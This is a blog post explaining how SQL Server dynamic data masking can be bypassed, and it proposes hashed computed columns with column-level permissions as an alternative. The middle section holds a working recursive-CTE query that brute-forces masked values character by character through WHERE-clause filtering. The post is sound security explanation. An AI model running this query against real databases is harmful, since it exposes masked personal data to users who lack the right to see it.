An alternative to data masking

Dynamic data masking is a neat new feature in recent SQL Server versions that allows you to protect sensitive information from non-privileged users by masking it. But using a brute-force guessing attack, even a non-privileged user can guess the contents of a masked column. And if you’re on SQL Server 2014 or earlier, you won’t have the option of using data masking at all.

Read on to see how you can bypass dynamic data masking, and for an alternative approach that uses SQL Server column-level security instead.

How to set up dynamic data masking

Here’s the basic setup for a table with some sensitive data.

CREATE TABLE dbo.SensitiveStuff (
    ID                int NOT NULL,
    CustomerName      varchar(100) NOT NULL,
    CONSTRAINT PK_SensitiveStuff PRIMARY KEY CLUSTERED (ID)
);

--- We'll allow Trevor, our low-privilege user to read
--- the contents, but we'll apply a mask, so he can't
--- see the plaintext:
GRANT SELECT ON dbo.SensitiveStuff TO trevor;

--- Here's the masking:
ALTER TABLE dbo.SensitiveStuff
    ALTER COLUMN CustomerName
       ADD MASKED WITH (FUNCTION = 'default()');

--- And some data to play with:
INSERT INTO dbo.SensitiveStuff (CustomerName)
VALUES ('Customer name goes here.');

Now, if we try to connect as Trevor…

EXECUTE AS USER='trevor';
SELECT CustomerName FROM dbo.SensitiveStuff;

REVERT;

… all we see of the masked data is:

CustomerName
------------
xxxx

That’s the idea. If you have a front-end reporting tool like SSRS or Power BI, this might be sufficient for you.

… and how to bypass it

Let’s apply a mischievous mentality – how could we go about cracking this?

SELECT COUNT(*) AS xxx_exists
FROM dbo.SensitiveStuff
WHERE CustomerName LIKE 'xxx%';

SELECT COUNT(*) AS cust_exists
FROM dbo.SensitiveStuff
WHERE CustomerName LIKE 'Cust%';

… returns:

xxx_exists
----------
0

.. and:

cust_exits
----------
1

You see where I’m going with this? The WHERE clause has to match unmasked data in order to make anything in the database work – joins, filters, etc. We can exploit this by trying every permutation of every value you could fit in the column.

Long story short, here’s how I could go about trying to brute-force the contents of the column: First, find out how long the value is by checking WHERE LEN(CustomerName)=@x for each incrementing value of @x until you hit a value.

Next, try to see, character by character, if you can build the string.

A%? No.
B%? No.
C%? Yes!

Ca%? No.
Cb%? No.
Cc%? No.
.. and so on.

The recursive common table equivalent of the above looks something like this:

--- Declaring the row ID (@id)
DECLARE @id     int=1,
--- ... and the column's declared maximum length (@maxlen):
        @maxlen int=(SELECT max_length
                     FROM sys.columns
                     WHERE [object_id]=OBJECT_ID('dbo.SensitiveStuff')
                       AND [name]='CustomerName');

--- Every conceivable CHAR():
---
--- Loop through every character code, from 1 to 255:
WITH ch AS (
    SELECT 1 AS i, CHAR(1) AS ch

    UNION ALL

    SELECT i+1, CHAR(i+1) AS ch FROM ch WHERE i<255),

--- Now, brute-force the length of the string:
---
--- Try every length, from 0 to the column's declared
--- maximum length (@maxlen) until we find the length:
l AS (
    SELECT -1 AS stringlen, CAST(NULL AS bit) AS marker

    UNION ALL
    SELECT stringlen+1, x.marker
    FROM l
    OUTER APPLY (
        SELECT CAST(1 AS bit) AS marker
        FROM dbo.SensitiveStuff
        WHERE ID=@id AND LEN(CustomerName)=stringlen+1
    ) AS x
    WHERE l.stringlen<@maxlen
      AND l.marker IS NULL),
 
--- Finally, brute-force the string value, one character at a time:
---
--- For each offset in the string, try every character. So,
--- for a 24-character string, this will result in a little
--- more than 6000 iterations.
s AS (
    SELECT 0 AS offset, CAST('' AS varchar(max)) AS string

    UNION ALL

    SELECT s.offset+1, CAST(s.string+ch.ch AS varchar(max)) AS string
    FROM s
    CROSS JOIN ch
    CROSS APPLY (
        SELECT CAST(1 AS bit) AS marker
        FROM dbo.SensitiveStuff
        WHERE ID=@id AND CAST(LEFT(CustomerName, s.offset+1) AS varbinary(max))=CAST(s.string+ch.ch AS varbinary(max))
    ) AS x
    WHERE s.offset<(SELECT stringlen
                    FROM l
                    WHERE marker IS NOT NULL))
 
--- and here's the result:
SELECT TOP (1) string
FROM s
ORDER BY string DESC
OPTION (MAXRECURSION 0);

If you want better performance, you can add interval-halving/bisection logic to arrive faster at your results, but I didn’t want to bloat the example code.

With any significant data volume, you would obviously have to dramatically re-write this query, but the idea is the same: Exploiting the fact that the filter in the WHERE clause is applied to the unmasked column value. Microsoft also acknowledges this in the documentation.

Like the name implies, Dynamic Data Masking should perhaps be considered a graphical interface feature, much like the **** masking your password when you log on to a web page, not really a proper security feature that would protect you against data theft.

An alternative masking solution

In closing, I would offer a different solution to data masking, one that also works with older versions of SQL Server:

  • Add a computed column that does the masking. Hashing is great for some purposes, but you may want to roll your own text string logic for visual reports and things.
  • Then grant column-level permissions to your security principals, allowing them to read only the masked and non-sensitive columns in the table.
CREATE TABLE dbo.SensitiveStuff (
    ID                 int NOT NULL,
    CustomerName       varchar(100) NOT NULL,
    --- Here's the computed column:
    Customer_masked AS HASHBYTES('SHA2_256', CustomerName),
    CONSTRAINT PK_SensitiveStuff PRIMARY KEY CLUSTERED (ID)
);

--- Assign column-level permissions
GRANT SELECT ON dbo.SensitiveStuff(ID, Customer_masked) TO trevor;

Now, when Trevor wants to read from the table, he’ll get a permission error when he tries to read the CustomerName column, but he can see the hashed customer name in the Customer_masked column.

It’s not precisely the same functionality as Dynamic Data Masking (because you need to assign different column names depending on if you want the masked/unmasked data), but it allows you to set up a security model where some principals have access to masked data and others can see the plain value.

One thought on “An alternative to data masking

  1. Pingback: Data Masking Prior To SQL Server 2016 – Curated SQL

Let me hear your thoughts!

This site uses Akismet to reduce spam. Learn how your comment data is processed.